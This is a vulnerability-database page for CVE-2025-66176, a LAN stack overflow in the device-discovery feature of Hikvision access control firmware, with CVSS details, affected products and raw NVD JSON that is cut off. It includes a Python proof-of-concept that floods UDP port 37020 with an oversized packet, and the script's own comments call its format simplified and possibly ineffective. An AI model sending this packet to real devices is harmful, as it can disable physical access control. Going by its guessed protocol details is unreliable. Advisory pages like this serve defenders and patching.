Security Vulnerability Report
中文
CVE-2025-66176 CVSS 8.8 HIGH

CVE-2025-66176

Published: 2026-01-13 03:16:01
Last Modified: 2026-03-18 16:16:24
Source: [email protected]

Description

There is a Stack overflow Vulnerability in the device Search and Discovery feature of Hikvision Access Control Products. If exploited, an attacker on the same local area network (LAN) could cause the device to malfunction by sending specially crafted packets to an unpatched device.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:hikvision:ds-k1t331_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-k1t331:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hikvision:ds-k1t341a_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-k1t341a:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hikvision:ds-k1t341b_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-k1t341b:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hikvision:ds-k1t671_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-k1t671:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:hikvision:ds-k5671_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:hikvision:ds-k5671:-:*:*:*:*:*:*:* - NOT VULNERABLE
Hikvision Access Control Products (固件版本未列出,具体受影响版本请参考厂商官方公告)
建议联系海康威视官方获取受影响产品的完整版本列表和安全补丁信息

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66176 PoC - Educational Purpose Only # This code is for security research and defensive purposes only import socket import struct def create_malicious_packet(): """ Create a malformed device discovery packet that could trigger the stack overflow in Hikvision Access Control products. Note: This is a simplified demonstration and may not work on all versions. """ # Protocol header header = b'\x00\x01' # Discovery protocol version # Command type - search response cmd_type = b'\x00\x04' # Create oversized payload to trigger buffer overflow # The actual overflow condition depends on the specific firmware version overflow_length = 2000 # Example length, actual may vary payload = b'A' * overflow_length # Construct packet packet = header + cmd_type + payload return packet def send_exploit(target_ip, target_port=37020): """ Send the exploit packet to target device. Args: target_ip: Target device IP address target_port: Target port (default 37020 for Hikvision discovery) """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) packet = create_malicious_packet() try: sock.sendto(packet, (target_ip, target_port)) print(f'[+] Malicious packet sent to {target_ip}:{target_port}') print(f'[+] Packet size: {len(packet)} bytes') except Exception as e: print(f'[-] Error: {e}') finally: sock.close() if __name__ == '__main__': print('CVE-2025-66176 PoC - For authorized testing only') # Replace with authorized target # send_exploit('192.168.1.100')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66176", "sourceIdentifier": "[email protected]", "published": "2026-01-13T03:16:01.097", "lastModified": "2026-03-18T16:16:23.943", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a Stack overflow Vulnerability in the device Search and Discovery feature of Hikvision Access Control Products. If exploited, an attacker on the same local area network (LAN) could cause the device to malfunction by sending specially crafted packets to an unpatched device."}, {"lang": "es", "value": "Hay una vulnerabilidad de desbordamiento de pila en la función de búsqueda y descubrimiento de dispositivos de los productos de control de acceso de Hikvision. Si se explota, un atacante en la misma red de área local (LAN) podría causar un mal funcionamiento del dispositivo enviando paquetes especialmente diseñados a un dispositivo sin parchear."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t331_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "3FEF4CC2-2B13-4A80-8C57-68600AE9C93A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t331:-:*:*:*:*:*:*:*", "matchCriteriaId": "9C6570A0-091A-49E4-8B04-650397FBD93D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t341a_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "0B6CAC82-004C-4919-9234-89004136537D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t341a:-:*:*:*:*:*:*:*", "matchCriteriaId": "595B2854-FCC2-4DC9-9821-7545FE940FAC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t341b_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "BA1A7F5D-F33C-4F15-8639-30CDCD7C1455"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t341b:-:*:*:*:*:*:*:*", "matchCriteriaId": "3A7C6C26-52D1-4E9D-8448-29B78F692448"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t671_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "7841DA8E-1AE6-46F6-BB86-360B8624F85D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t671:-:*:*:*:*:*:*:*", "matchCriteriaId": "4B322AE4-4BE3-46EE-BFFD-730274270D52"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k5671_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "9362042E-F45C-43E3-9709-3D17DE1E476A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k5671:-:*:*:*:*:*:*:*", "matchCriteriaId": "33DF42F9-AA7B-4275-A0F5-6CD1C395379F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t672_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "A68F9962-7C8E-46AF-BFA2-372191D585AA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t672:-:*:*:*:*:*:*:*", "matchCriteriaId": "58E41B4D-6601-4F72-BE90-1A119FFB3A0A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t680_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80", "matchCriteriaId": "E4F9199C-DEAD-430C-B2A7-FF493DAEB8EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-k1t680:-:*:*:*:*:*:*:*", "matchCriteriaId": "9166334C-35C0-4220-AF7B-1964E32B4451"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-k1t981_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.80" ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.